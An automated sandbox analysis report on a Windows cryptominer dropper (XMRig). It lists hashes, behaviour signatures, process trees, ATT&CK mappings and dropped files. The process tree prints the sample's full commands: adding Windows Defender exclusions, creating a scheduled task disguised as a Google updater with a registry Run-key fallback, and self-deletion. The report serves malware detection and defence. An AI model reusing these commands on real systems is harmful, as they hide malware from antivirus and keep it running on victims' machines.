Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    426s
  • max time network
    1800s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1068
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2496
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2484
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2800
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2036
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1032
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:2044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:764
    • C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      1⤵
      • Creates scheduled task(s)
      PID:2664
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:3008
      • C:\Program Files\Google\Chrome\updater.exe
        "C:\Program Files\Google\Chrome\updater.exe"
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3000
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {B5D8D339-5367-47B2-BDD0-4717FA18F29C} S-1-5-18:NT AUTHORITY\System:Service:
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2840
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:2828
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1692
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          1⤵
          • Creates scheduled task(s)
          PID:2536

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          361KB

          MD5

          4031ca3424a0cd802b901b1dd3c2cf6d

          SHA1

          3c037847dfb69b9d151b307fc7fa8ef0621960f5

          SHA256

          cd5b3a821b766cb7ec044987af8c7c2d33732bed0e4d39a2f3d9eecdf6140189

          SHA512

          7516b019b06417137dbf26f1da7280072ccc7cf6f29aa85f9520b88dddcad814aae3e49611e5154bf53320bf76e7d1ae34241ce4cc6485906bce4e88ebcd8966

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          51KB

          MD5

          eb4d234f99d38f7a3d6e405a62dd1550

          SHA1

          10d9d405a532138860d8f5fb8c7269ac0197b631

          SHA256

          46881f9a6274089637bd17494c36c73edce35b60b137c54cb754edcce85fb47c

          SHA512

          4a80406386d57cfbade9f9b6f0951bdabfa51624d2dd82419fc630333e5f79eb17c3964668ecebb1ef2ef017c2546428b000342317e5ad308fe74ed0aed73d2a

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\THP3O7ZN7F5VGQ3SEPKE.temp
          Filesize

          7KB

          MD5

          77dcdbb5b72bbbe67252f3302559b0cf

          SHA1

          141390959b37537e9dd32e2513a96318d23b1bd7

          SHA256

          8e8d887acd1fca0e65e3c7261aa8f8f7101cd6ec9d9def099831d4cdcb5b5a30

          SHA512

          e50b338318dacb5b1ddd41f8c1473806e16355ff79632e52659dbaddba059eea5555ab92191c36fcf92382d6a49a33005224d2b9cb3aa2faa720ed1e1cdc076d

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          260KB

          MD5

          cbcd0d812fa8bcb8507d2be4a8d24f4d

          SHA1

          9abe2e69e184f051071652e40f43872c62f59687

          SHA256

          0118d4b1f2e67afc3bec0cb0d676f4c46213cb88a5b0e67b3fe6569e023fa497

          SHA512

          381a69583d424b2872438f385ec1d3fe248a512ed9872fbc0da03ea813b846ae1dc0001eb085295d32154d49d7773ce7cadabead0e4605b2a108eb97227f03c2

        • memory/764-52-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/764-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/764-51-0x00000000008D0000-0x0000000000950000-memory.dmp
          Filesize

          512KB

        • memory/764-49-0x00000000008D0000-0x0000000000950000-memory.dmp
          Filesize

          512KB

        • memory/764-47-0x00000000008D0000-0x0000000000950000-memory.dmp
          Filesize

          512KB

        • memory/764-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/764-50-0x00000000008D0000-0x0000000000950000-memory.dmp
          Filesize

          512KB

        • memory/1540-59-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/1540-53-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/1540-58-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/1540-57-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/1540-56-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/1540-55-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/1540-54-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/2036-77-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2036-71-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2112-35-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2112-37-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2112-38-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2112-39-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2112-41-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2112-40-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2112-36-0x0000000002760000-0x00000000027E0000-memory.dmp
          Filesize

          512KB

        • memory/2484-13-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2484-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2484-10-0x0000000002AB0000-0x0000000002B30000-memory.dmp
          Filesize

          512KB

        • memory/2484-11-0x0000000002AB0000-0x0000000002B30000-memory.dmp
          Filesize

          512KB

        • memory/2484-12-0x0000000002ABB000-0x0000000002B22000-memory.dmp
          Filesize

          412KB

        • memory/2484-6-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
          Filesize

          32KB

        • memory/2484-8-0x0000000002AB0000-0x0000000002B30000-memory.dmp
          Filesize

          512KB

        • memory/2484-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
          Filesize

          9.6MB

        • memory/2484-5-0x000000001B470000-0x000000001B752000-memory.dmp
          Filesize

          2.9MB

        • memory/2496-29-0x000000013F920000-0x000000013FB31000-memory.dmp
          Filesize

          2.1MB

        • memory/2496-0-0x000000013F920000-0x000000013FB31000-memory.dmp
          Filesize

          2.1MB

        • memory/2636-67-0x00000000001F0000-0x0000000000210000-memory.dmp
          Filesize

          128KB

        • memory/2636-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-135-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-133-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-69-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/2636-70-0x00000000004A0000-0x00000000004C0000-memory.dmp
          Filesize

          128KB

        • memory/2636-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-75-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/2636-76-0x00000000004A0000-0x00000000004C0000-memory.dmp
          Filesize

          128KB

        • memory/2636-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2636-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2800-20-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/2800-22-0x0000000001E40000-0x0000000001E48000-memory.dmp
          Filesize

          32KB

        • memory/2800-25-0x0000000002B00000-0x0000000002B80000-memory.dmp
          Filesize

          512KB

        • memory/2800-24-0x0000000002B00000-0x0000000002B80000-memory.dmp
          Filesize

          512KB

        • memory/2800-26-0x0000000002B00000-0x0000000002B80000-memory.dmp
          Filesize

          512KB

        • memory/2800-27-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/2800-23-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
          Filesize

          9.6MB

        • memory/2800-21-0x0000000002B00000-0x0000000002B80000-memory.dmp
          Filesize

          512KB

        • memory/2800-19-0x000000001B680000-0x000000001B962000-memory.dmp
          Filesize

          2.9MB

        • memory/3000-45-0x000000013F570000-0x000000013F781000-memory.dmp
          Filesize

          2.1MB

        • memory/3000-66-0x000000013F570000-0x000000013F781000-memory.dmp
          Filesize

          2.1MB